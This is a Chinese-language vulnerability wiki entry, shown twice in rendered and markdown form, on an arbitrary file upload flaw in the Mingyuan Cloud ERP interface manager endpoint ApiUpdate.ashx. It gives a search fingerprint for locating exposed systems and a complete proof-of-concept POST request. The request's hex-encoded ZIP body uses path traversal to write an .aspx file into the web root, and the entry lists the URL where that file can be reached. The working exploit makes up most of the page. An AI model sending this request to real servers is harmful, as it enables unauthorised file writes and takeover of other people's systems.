fofamini-wiki

登录白背景

源码

明源云 ERP系统接口管家 ApiUpdate.ashx 任意文件上传漏洞

https://jdr2021.github.io/2023/08/16/%E6%98%8E%E6%BA%90%E4%BA%91%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%A4%8D%E7%8E%B0/#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0

漏洞描述

明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞，攻击者通过构造特殊的ZIP压缩包可以上传任意文件，控制服务器

漏洞影响

<a-checkbox checked>明源云 ERP系统接口管家</a-checkbox>

网络测绘

<a-checkbox checked>"接口管家站点正常！"</a-checkbox>

漏洞复现

登录页面

漏洞存在于某端口下的接口管家服务

验证POC

POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856

{{hexdec(504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000)}}

/fdccloud/_/test.aspx

# 明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞

https://jdr2021.github.io/2023/08/16/%E6%98%8E%E6%BA%90%E4%BA%91%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%A4%8D%E7%8E%B0/#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0

## 漏洞描述

明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞，攻击者通过构造特殊的ZIP压缩包可以上传任意文件，控制服务器

## 漏洞影响

<a-checkbox checked>明源云 ERP系统接口管家</a-checkbox></br>

## 网络测绘

<a-checkbox checked>"接口管家站点正常！"</a-checkbox></br>

## 漏洞复现

登录页面

![img](https://github.com/PeiQi0/PeiQi-WIKI-Book/raw/main/docs/.vuepress/public/img/1662522673554-08514e40-82db-42e2-8a4a-ee04e3b55404.png)

漏洞存在于某端口下的接口管家服务

![img](https://github.com/PeiQi0/PeiQi-WIKI-Book/raw/main/docs/.vuepress/public/img/1691996151207-69a0200e-d9a7-4d60-b390-e1c9a22edc6c.png)

验证POC

```http
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856

{{hexdec(504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000)}}
```

![img](../../../.vuepress/public/img/1691996174406-479b4fcb-a1ee-42a0-9228-6df077c3bd15.png)

```http
/fdccloud/_/test.aspx
```